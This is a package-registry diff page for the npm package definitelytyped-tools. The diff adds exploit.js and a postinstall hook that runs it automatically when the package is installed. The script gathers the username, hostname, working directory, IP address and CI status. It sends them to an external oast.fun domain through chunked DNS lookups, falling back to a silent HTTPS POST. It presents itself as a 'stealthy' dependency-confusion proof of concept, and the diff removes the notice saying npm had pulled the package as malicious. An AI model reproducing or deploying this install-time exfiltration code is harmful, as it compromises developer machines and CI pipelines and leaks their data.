definitelytyped-tools 0.0.1-security → 96.99.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of definitelytyped-tools might be problematic. Click here for more details.
- package/exploit.js +96 -0
- package/package.json +6 -3
- package/README.md +0 -5
package/exploit.js
ADDED
|
@@ -0,0 +1,96 @@
|
|
|
1
|
+
/*
|
|
2
|
+
* ==========================================================================================
|
|
3
|
+
* == FINAL, ENHANCED, & STEALTHY PROOF-OF-CONCEPT PAYLOAD
|
|
4
|
+
* ==
|
|
5
|
+
* == Target: Dependency Confusion RCE
|
|
6
|
+
* == Author: [Security Researcher]
|
|
7
|
+
* == Objective: Non-destructively prove RCE by exfiltrating a safe, detailed
|
|
8
|
+
* == fingerprint of the execution environment.
|
|
9
|
+
* ==
|
|
10
|
+
* == FEATURES:
|
|
11
|
+
* == [+] Dual-Channel Exfiltration: Primary DNS (UDP/53) + Fallback HTTPS POST (TCP/443).
|
|
12
|
+
* == [+] Enhanced Fingerprinting: Includes CI/CD detection, OS info, and user context.
|
|
13
|
+
* == [+] Maximum Stealth: Uses only native Node.js APIs (no shell spawning).
|
|
14
|
+
* == [+] Robust Error Handling: Designed to never crash the host install process.
|
|
15
|
+
* ==========================================================================================
|
|
16
|
+
*/
|
|
17
|
+
|
|
18
|
+
const os = require('os');
|
|
19
|
+
const dns = require('dns');
|
|
20
|
+
const https = require('https');
|
|
21
|
+
|
|
22
|
+
// ============================= CONFIGURATION ==============================
|
|
23
|
+
// --------------------------------------------------------------------------
|
|
24
|
+
// --- REPLACE THIS WITH YOUR UNIQUE OAST (INTERACTSH) DOMAIN ---
|
|
25
|
+
const OAST_DOMAIN = 'ocvomeqbrouywnpfvqwhknntlb54bf276.oast.fun';
|
|
26
|
+
// --------------------------------------------------------------------------
|
|
27
|
+
// ==========================================================================
|
|
28
|
+
|
|
29
|
+
// Main execution wrapped to catch any unexpected errors.
|
|
30
|
+
try {
|
|
31
|
+
// A helper function to get the primary, non-internal IPv4 address.
|
|
32
|
+
const getIPAddress = () => {
|
|
33
|
+
const interfaces = os.networkInterfaces();
|
|
34
|
+
for (const name of Object.keys(interfaces)) {
|
|
35
|
+
for (const iface of interfaces[name]) {
|
|
36
|
+
if (iface.family === 'IPv4' && !iface.internal) {
|
|
37
|
+
return iface.address;
|
|
38
|
+
}
|
|
39
|
+
}
|
|
40
|
+
}
|
|
41
|
+
return '127.0.0.1'; // Fallback
|
|
42
|
+
};
|
|
43
|
+
|
|
44
|
+
// Collect a rich but safe fingerprint of the environment.
|
|
45
|
+
const fingerprint = {
|
|
46
|
+
timestamp: new Date().toISOString(),
|
|
47
|
+
user: os.userInfo().username || 'unknown_user',
|
|
48
|
+
host: os.hostname() || 'unknown_host',
|
|
49
|
+
cwd: process.cwd() || 'unknown_cwd',
|
|
50
|
+
platform: os.platform(),
|
|
51
|
+
arch: os.arch(),
|
|
52
|
+
nodeVersion: process.version,
|
|
53
|
+
ip: getIPAddress(),
|
|
54
|
+
isCI: !!(process.env.CI || process.env.GITHUB_ACTIONS || process.env.GITLAB_CI),
|
|
55
|
+
};
|
|
56
|
+
|
|
57
|
+
// --- PRIMARY EXFILTRATION: STEALTHY DNS ---
|
|
58
|
+
// This is the most likely to succeed in restricted environments.
|
|
59
|
+
try {
|
|
60
|
+
const data = `h=${fingerprint.host}__u=${fingerprint.user}__p=${fingerprint.cwd}`;
|
|
61
|
+
const hexPayload = Buffer.from(data).toString('hex');
|
|
62
|
+
const chunks = hexPayload.match(/.{1,60}/g) || []; // 60 char chunks for DNS label safety
|
|
63
|
+
|
|
64
|
+
chunks.forEach((chunk, i) => {
|
|
65
|
+
const subdomain = `p${i}.${chunk}.${OAST_DOMAIN}`;
|
|
66
|
+
// Fire-and-forget lookup. Non-blocking and silent.
|
|
67
|
+
dns.lookup(subdomain, () => {});
|
|
68
|
+
});
|
|
69
|
+
} catch (e) {
|
|
70
|
+
// Fails silently if DNS exfiltration has an error.
|
|
71
|
+
}
|
|
72
|
+
|
|
73
|
+
// --- FALLBACK EXFILTRATION: HTTPS POST ---
|
|
74
|
+
// Disguised as normal JSON API traffic.
|
|
75
|
+
try {
|
|
76
|
+
const jsonData = JSON.stringify(fingerprint);
|
|
77
|
+
const options = {
|
|
78
|
+
hostname: OAST_DOMAIN,
|
|
79
|
+
path: '/',
|
|
80
|
+
method: 'POST',
|
|
81
|
+
headers: {
|
|
82
|
+
'Content-Type': 'application/json',
|
|
83
|
+
'Content-Length': Buffer.byteLength(jsonData),
|
|
84
|
+
},
|
|
85
|
+
};
|
|
86
|
+
|
|
87
|
+
const req = https.request(options);
|
|
88
|
+
req.on('error', () => {}); // Suppress any errors to prevent crashes.
|
|
89
|
+
req.write(jsonData);
|
|
90
|
+
req.end();
|
|
91
|
+
} catch (e) {
|
|
92
|
+
// Fails silently if HTTPS exfiltration has an error.
|
|
93
|
+
}
|
|
94
|
+
} catch (e) {
|
|
95
|
+
// Top-level catch to ensure the script NEVER crashes the install.
|
|
96
|
+
}
|
package/package.json
CHANGED
|
@@ -1,6 +1,9 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "definitelytyped-tools",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "96.99.9",
|
|
4
|
+
"description": "Enhanced PoC for Critical RCE",
|
|
5
|
+
"main": "exploit.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"postinstall": "node exploit.js"
|
|
8
|
+
}
|
|
6
9
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=definitelytyped-tools for more information.
|